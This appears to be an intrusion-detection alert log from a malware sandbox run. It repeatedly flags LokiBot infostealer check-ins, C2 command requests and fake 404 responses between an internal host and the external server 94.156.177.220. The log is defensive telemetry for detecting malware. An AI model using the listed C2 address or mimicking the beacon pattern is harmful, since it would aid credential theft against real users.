                                  2024-10-25T10:20:50.632516+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977494.156.177.22080TCP
                                  2024-10-25T10:20:50.632516+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977494.156.177.22080TCP
                                  2024-10-25T10:20:50.632516+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977494.156.177.22080TCP
                                  2024-10-25T10:20:51.603400+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977494.156.177.22080TCP
                                  2024-10-25T10:20:51.603400+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977494.156.177.22080TCP
                                  2024-10-25T10:20:51.609517+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449774TCP
                                  2024-10-25T10:20:52.029076+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977594.156.177.22080TCP
                                  2024-10-25T10:20:52.029076+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977594.156.177.22080TCP
                                  2024-10-25T10:20:52.029076+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977594.156.177.22080TCP
                                  2024-10-25T10:20:53.016672+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977594.156.177.22080TCP
                                  2024-10-25T10:20:53.016672+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977594.156.177.22080TCP
                                  2024-10-25T10:20:53.022733+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449775TCP
                                  2024-10-25T10:20:53.168380+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977694.156.177.22080TCP
                                  2024-10-25T10:20:53.168380+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977694.156.177.22080TCP
                                  2024-10-25T10:20:53.168380+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977694.156.177.22080TCP
                                  2024-10-25T10:20:54.133034+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977694.156.177.22080TCP
                                  2024-10-25T10:20:54.133034+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977694.156.177.22080TCP
                                  2024-10-25T10:20:54.139132+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449776TCP
                                  2024-10-25T10:20:54.305428+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977794.156.177.22080TCP
                                  2024-10-25T10:20:54.305428+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977794.156.177.22080TCP
                                  2024-10-25T10:20:54.305428+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977794.156.177.22080TCP
                                  2024-10-25T10:20:55.280818+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977794.156.177.22080TCP
                                  2024-10-25T10:20:55.280818+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977794.156.177.22080TCP
                                  2024-10-25T10:20:55.287327+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449777TCP
                                  2024-10-25T10:20:55.471024+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977994.156.177.22080TCP
                                  2024-10-25T10:20:55.471024+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977994.156.177.22080TCP
                                  2024-10-25T10:20:55.471024+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977994.156.177.22080TCP
                                  2024-10-25T10:20:56.431956+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977994.156.177.22080TCP
                                  2024-10-25T10:20:56.431956+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977994.156.177.22080TCP
                                  2024-10-25T10:20:56.437553+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449779TCP
                                  2024-10-25T10:20:56.594180+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978094.156.177.22080TCP
                                  2024-10-25T10:20:56.594180+02002025381ET MALWARE LokiBot Checkin1192.168.2.44978094.156.177.22080TCP
                                  2024-10-25T10:20:56.594180+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978094.156.177.22080TCP
                                  2024-10-25T10:20:57.593283+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978094.156.177.22080TCP
                                  2024-10-25T10:20:57.593283+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978094.156.177.22080TCP
                                  2024-10-25T10:20:57.600381+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449780TCP
                                  2024-10-25T10:20:58.015959+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978294.156.177.22080TCP
                                  2024-10-25T10:20:58.015959+02002025381ET MALWARE LokiBot Checkin1192.168.2.44978294.156.177.22080TCP
                                  2024-10-25T10:20:58.015959+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978294.156.177.22080TCP
                                  2024-10-25T10:20:59.001743+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978294.156.177.22080TCP
                                  2024-10-25T10:20:59.001743+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978294.156.177.22080TCP
                                  2024-10-25T10:20:59.008492+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449782TCP
                                  2024-10-25T10:20:59.156243+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979394.156.177.22080TCP
                                  2024-10-25T10:20:59.156243+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979394.156.177.22080TCP
                                  2024-10-25T10:20:59.156243+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979394.156.177.22080TCP
                                  2024-10-25T10:21:00.130045+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979394.156.177.22080TCP
                                  2024-10-25T10:21:00.130045+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979394.156.177.22080TCP
                                  2024-10-25T10:21:00.135806+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449793TCP
                                  2024-10-25T10:21:00.311298+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979994.156.177.22080TCP
                                  2024-10-25T10:21:00.311298+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979994.156.177.22080TCP
                                  2024-10-25T10:21:00.311298+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979994.156.177.22080TCP
                                  2024-10-25T10:21:01.269869+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979994.156.177.22080TCP
                                  2024-10-25T10:21:01.269869+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979994.156.177.22080TCP
                                  2024-10-25T10:21:01.275786+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449799TCP
                                  2024-10-25T10:21:01.419074+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980594.156.177.22080TCP
                                  2024-10-25T10:21:01.419074+02002025381ET MALWARE LokiBot Checkin1192.168.2.44980594.156.177.22080TCP
                                  2024-10-25T10:21:01.419074+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980594.156.177.22080TCP
                                  2024-10-25T10:21:02.412807+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980594.156.177.22080TCP
                                  2024-10-25T10:21:02.412807+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980594.156.177.22080TCP
                                  2024-10-25T10:21:02.418624+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449805TCP
                                  2024-10-25T10:21:02.575992+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981194.156.177.22080TCP
                                  2024-10-25T10:21:02.575992+02002025381ET MALWARE LokiBot Checkin1192.168.2.44981194.156.177.22080TCP
                                  2024-10-25T10:21:02.575992+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981194.156.177.22080TCP
                                  2024-10-25T10:21:03.549599+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981194.156.177.22080TCP
                                  2024-10-25T10:21:03.549599+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981194.156.177.22080TCP
                                  2024-10-25T10:21:03.555551+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449811TCP
                                  2024-10-25T10:21:04.300437+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982294.156.177.22080TCP
                                  2024-10-25T10:21:04.300437+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982294.156.177.22080TCP
                                  2024-10-25T10:21:04.300437+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982294.156.177.22080TCP
                                  2024-10-25T10:21:05.290132+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982294.156.177.22080TCP
                                  2024-10-25T10:21:05.290132+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982294.156.177.22080TCP
                                  2024-10-25T10:21:05.295989+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449822TCP
                                  2024-10-25T10:21:05.450685+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982894.156.177.22080TCP
                                  2024-10-25T10:21:05.450685+02002025381ET MALWARE LokiBot Checkin1192.168.2.44982894.156.177.22080TCP
                                  2024-10-25T10:21:05.450685+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982894.156.177.22080TCP
                                  2024-10-25T10:21:06.443742+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982894.156.177.22080TCP
                                  2024-10-25T10:21:06.443742+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982894.156.177.22080TCP
                                  2024-10-25T10:21:06.449512+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449828TCP
                                  2024-10-25T10:21:06.702578+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983694.156.177.22080TCP
                                  2024-10-25T10:21:06.702578+02002025381ET MALWARE LokiBot Checkin1192.168.2.44983694.156.177.22080TCP
                                  2024-10-25T10:21:06.702578+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983694.156.177.22080TCP
                                  2024-10-25T10:21:07.670809+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983694.156.177.22080TCP
                                  2024-10-25T10:21:07.670809+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983694.156.177.22080TCP
                                  2024-10-25T10:21:07.676728+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449836TCP
                                  2024-10-25T10:21:07.823534+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984294.156.177.22080TCP
                                  2024-10-25T10:21:07.823534+02002025381ET MALWARE LokiBot Checkin1192.168.2.44984294.156.177.22080TCP
                                  2024-10-25T10:21:07.823534+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984294.156.177.22080TCP
                                  2024-10-25T10:21:08.796273+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984294.156.177.22080TCP
                                  2024-10-25T10:21:08.796273+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984294.156.177.22080TCP
                                  2024-10-25T10:21:08.802409+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449842TCP
                                  2024-10-25T10:21:08.970566+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44985194.156.177.22080TCP
                                  2024-10-25T10:21:08.970566+02002025381ET MALWARE LokiBot Checkin1192.168.2.44985194.156.177.22080TCP
                                  2024-10-25T10:21:08.970566+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44985194.156.177.22080TCP
                                  2024-10-25T10:21:09.928770+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44985194.156.177.22080TCP
                                  2024-10-25T10:21:09.928770+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44985194.156.177.22080TCP
                                  2024-10-25T10:21:09.934486+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449851TCP
                                  2024-10-25T10:21:10.210497+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44985894.156.177.22080TCP
                                  2024-10-25T10:21:10.210497+02002025381ET MALWARE LokiBot Checkin1192.168.2.44985894.156.177.22080TCP
                                  2024-10-25T10:21:10.210497+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44985894.156.177.22080TCP
                                  2024-10-25T10:21:11.186518+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44985894.156.177.22080TCP
                                  2024-10-25T10:21:11.186518+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44985894.156.177.22080TCP
                                  2024-10-25T10:21:11.192386+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449858TCP
                                  2024-10-25T10:21:11.347066+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44986494.156.177.22080TCP
                                  2024-10-25T10:21:11.347066+02002025381ET MALWARE LokiBot Checkin1192.168.2.44986494.156.177.22080TCP
                                  2024-10-25T10:21:11.347066+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44986494.156.177.22080TCP
                                  2024-10-25T10:21:12.311125+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44986494.156.177.22080TCP
                                  2024-10-25T10:21:12.311125+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44986494.156.177.22080TCP
                                  2024-10-25T10:21:12.316954+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449864TCP
                                  2024-10-25T10:21:12.693350+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44987194.156.177.22080TCP
                                  2024-10-25T10:21:12.693350+02002025381ET MALWARE LokiBot Checkin1192.168.2.44987194.156.177.22080TCP
                                  2024-10-25T10:21:12.693350+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44987194.156.177.22080TCP
                                  2024-10-25T10:21:13.646861+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44987194.156.177.22080TCP
                                  2024-10-25T10:21:13.646861+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44987194.156.177.22080TCP
                                  2024-10-25T10:21:13.652804+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449871TCP
                                  2024-10-25T10:21:13.812456+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44987794.156.177.22080TCP
                                  2024-10-25T10:21:13.812456+02002025381ET MALWARE LokiBot Checkin1192.168.2.44987794.156.177.22080TCP
                                  2024-10-25T10:21:13.812456+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44987794.156.177.22080TCP
                                  2024-10-25T10:21:14.786667+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44987794.156.177.22080TCP
                                  2024-10-25T10:21:14.786667+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44987794.156.177.22080TCP
                                  2024-10-25T10:21:14.792765+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449877TCP
                                  2024-10-25T10:21:14.957762+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44988394.156.177.22080TCP
                                  2024-10-25T10:21:14.957762+02002025381ET MALWARE LokiBot Checkin1192.168.2.44988394.156.177.22080TCP
                                  2024-10-25T10:21:14.957762+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44988394.156.177.22080TCP
                                  2024-10-25T10:21:15.924397+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44988394.156.177.22080TCP
                                  2024-10-25T10:21:15.924397+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44988394.156.177.22080TCP
                                  2024-10-25T10:21:15.930332+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449883TCP
                                  2024-10-25T10:21:16.552285+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44989494.156.177.22080TCP
                                  2024-10-25T10:21:16.552285+02002025381ET MALWARE LokiBot Checkin1192.168.2.44989494.156.177.22080TCP
                                  2024-10-25T10:21:16.552285+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44989494.156.177.22080TCP
                                  2024-10-25T10:21:17.523591+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44989494.156.177.22080TCP
                                  2024-10-25T10:21:17.523591+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44989494.156.177.22080TCP
                                  2024-10-25T10:21:17.529729+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449894TCP
                                  2024-10-25T10:21:17.694981+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44990094.156.177.22080TCP
                                  2024-10-25T10:21:17.694981+02002025381ET MALWARE LokiBot Checkin1192.168.2.44990094.156.177.22080TCP
                                  2024-10-25T10:21:17.694981+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44990094.156.177.22080TCP
                                  2024-10-25T10:21:18.678850+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44990094.156.177.22080TCP
                                  2024-10-25T10:21:18.678850+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44990094.156.177.22080TCP
                                  2024-10-25T10:21:18.684574+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449900TCP
                                  2024-10-25T10:21:19.204894+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44991094.156.177.22080TCP
                                  2024-10-25T10:21:19.204894+02002025381ET MALWARE LokiBot Checkin1192.168.2.44991094.156.177.22080TCP
                                  2024-10-25T10:21:19.204894+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44991094.156.177.22080TCP
                                  2024-10-25T10:21:20.169405+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44991094.156.177.22080TCP
                                  2024-10-25T10:21:20.169405+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44991094.156.177.22080TCP
                                  2024-10-25T10:21:20.175088+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449910TCP
                                  2024-10-25T10:21:20.326057+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44991794.156.177.22080TCP
                                  2024-10-25T10:21:20.326057+02002025381ET MALWARE LokiBot Checkin1192.168.2.44991794.156.177.22080TCP
                                  2024-10-25T10:21:20.326057+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44991794.156.177.22080TCP
                                  2024-10-25T10:21:21.278945+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44991794.156.177.22080TCP
                                  2024-10-25T10:21:21.278945+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44991794.156.177.22080TCP
                                  2024-10-25T10:21:21.284965+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449917TCP
                                  2024-10-25T10:21:21.441410+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44992494.156.177.22080TCP
                                  2024-10-25T10:21:21.441410+02002025381ET MALWARE LokiBot Checkin1192.168.2.44992494.156.177.22080TCP
                                  2024-10-25T10:21:21.441410+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44992494.156.177.22080TCP
                                  2024-10-25T10:21:22.431466+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44992494.156.177.22080TCP
                                  2024-10-25T10:21:22.431466+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44992494.156.177.22080TCP
                                  2024-10-25T10:21:22.437264+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449924TCP
                                  2024-10-25T10:21:22.907366+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44993494.156.177.22080TCP
                                  2024-10-25T10:21:22.907366+02002025381ET MALWARE LokiBot Checkin1192.168.2.44993494.156.177.22080TCP
                                  2024-10-25T10:21:22.907366+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44993494.156.177.22080TCP
                                  2024-10-25T10:21:23.917885+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44993494.156.177.22080TCP
                                  2024-10-25T10:21:23.917885+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44993494.156.177.22080TCP
                                  2024-10-25T10:21:23.924135+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449934TCP
                                  2024-10-25T10:21:24.073735+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44994094.156.177.22080TCP
                                  2024-10-25T10:21:24.073735+02002025381ET MALWARE LokiBot Checkin1192.168.2.44994094.156.177.22080TCP
                                  2024-10-25T10:21:24.073735+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44994094.156.177.22080TCP
                                  2024-10-25T10:21:25.060705+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44994094.156.177.22080TCP
                                  2024-10-25T10:21:25.060705+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44994094.156.177.22080TCP
                                  2024-10-25T10:21:25.066881+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449940TCP
                                  2024-10-25T10:21:25.575978+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44994794.156.177.22080TCP
                                  2024-10-25T10:21:25.575978+02002025381ET MALWARE LokiBot Checkin1192.168.2.44994794.156.177.22080TCP
                                  2024-10-25T10:21:25.575978+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44994794.156.177.22080TCP
                                  2024-10-25T10:21:26.544494+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44994794.156.177.22080TCP
                                  2024-10-25T10:21:26.544494+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44994794.156.177.22080TCP
                                  2024-10-25T10:21:26.551185+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449947TCP
                                  2024-10-25T10:21:26.705064+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44995494.156.177.22080TCP
                                  2024-10-25T10:21:26.705064+02002025381ET MALWARE LokiBot Checkin1192.168.2.44995494.156.177.22080TCP
                                  2024-10-25T10:21:26.705064+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44995494.156.177.22080TCP
                                  2024-10-25T10:21:27.664575+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44995494.156.177.22080TCP
                                  2024-10-25T10:21:27.664575+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44995494.156.177.22080TCP
                                  2024-10-25T10:21:27.670578+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449954TCP
                                  2024-10-25T10:21:27.827107+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44996394.156.177.22080TCP
                                  2024-10-25T10:21:27.827107+02002025381ET MALWARE LokiBot Checkin1192.168.2.44996394.156.177.22080TCP
                                  2024-10-25T10:21:27.827107+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44996394.156.177.22080TCP
                                  2024-10-25T10:21:28.795766+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44996394.156.177.22080TCP
                                  2024-10-25T10:21:28.795766+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44996394.156.177.22080TCP
                                  2024-10-25T10:21:28.801641+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449963TCP
                                  2024-10-25T10:21:28.952302+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44996994.156.177.22080TCP
                                  2024-10-25T10:21:28.952302+02002025381ET MALWARE LokiBot Checkin1192.168.2.44996994.156.177.22080TCP
                                  2024-10-25T10:21:28.952302+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44996994.156.177.22080TCP
                                  2024-10-25T10:21:29.966249+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44996994.156.177.22080TCP
                                  2024-10-25T10:21:29.966249+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44996994.156.177.22080TCP
                                  2024-10-25T10:21:29.973087+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449969TCP
                                  2024-10-25T10:21:30.120093+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44997594.156.177.22080TCP
                                  2024-10-25T10:21:30.120093+02002025381ET MALWARE LokiBot Checkin1192.168.2.44997594.156.177.22080TCP
                                  2024-10-25T10:21:30.120093+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44997594.156.177.22080TCP
                                  2024-10-25T10:21:31.093840+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44997594.156.177.22080TCP
                                  2024-10-25T10:21:31.093840+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44997594.156.177.22080TCP
                                  2024-10-25T10:21:31.099993+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449975TCP
                                  2024-10-25T10:21:31.244679+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44998594.156.177.22080TCP
                                  2024-10-25T10:21:31.244679+02002025381ET MALWARE LokiBot Checkin1192.168.2.44998594.156.177.22080TCP
                                  2024-10-25T10:21:31.244679+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44998594.156.177.22080TCP
                                  2024-10-25T10:21:32.205975+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44998594.156.177.22080TCP
                                  2024-10-25T10:21:32.205975+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44998594.156.177.22080TCP
                                  2024-10-25T10:21:32.212011+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449985TCP
                                  2024-10-25T10:21:32.352236+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44999194.156.177.22080TCP
                                  2024-10-25T10:21:32.352236+02002025381ET MALWARE LokiBot Checkin1192.168.2.44999194.156.177.22080TCP
                                  2024-10-25T10:21:32.352236+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44999194.156.177.22080TCP
                                  2024-10-25T10:21:33.334821+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44999194.156.177.22080TCP
                                  2024-10-25T10:21:33.334821+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44999194.156.177.22080TCP
                                  2024-10-25T10:21:33.340436+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449991TCP
                                  2024-10-25T10:21:33.496323+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44999894.156.177.22080TCP
                                  2024-10-25T10:21:33.496323+02002025381ET MALWARE LokiBot Checkin1192.168.2.44999894.156.177.22080TCP
                                  2024-10-25T10:21:33.496323+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44999894.156.177.22080TCP
                                  2024-10-25T10:21:34.473111+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44999894.156.177.22080TCP
                                  2024-10-25T10:21:34.473111+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44999894.156.177.22080TCP
                                  2024-10-25T10:21:34.478912+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.449998TCP
                                  2024-10-25T10:21:34.650472+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45000594.156.177.22080TCP
                                  2024-10-25T10:21:34.650472+02002025381ET MALWARE LokiBot Checkin1192.168.2.45000594.156.177.22080TCP
                                  2024-10-25T10:21:34.650472+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45000594.156.177.22080TCP
                                  2024-10-25T10:21:35.623881+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45000594.156.177.22080TCP
                                  2024-10-25T10:21:35.623881+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45000594.156.177.22080TCP
                                  2024-10-25T10:21:35.629820+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450005TCP
                                  2024-10-25T10:21:35.782292+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45001494.156.177.22080TCP
                                  2024-10-25T10:21:35.782292+02002025381ET MALWARE LokiBot Checkin1192.168.2.45001494.156.177.22080TCP
                                  2024-10-25T10:21:35.782292+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45001494.156.177.22080TCP
                                  2024-10-25T10:21:36.765800+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45001494.156.177.22080TCP
                                  2024-10-25T10:21:36.765800+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45001494.156.177.22080TCP
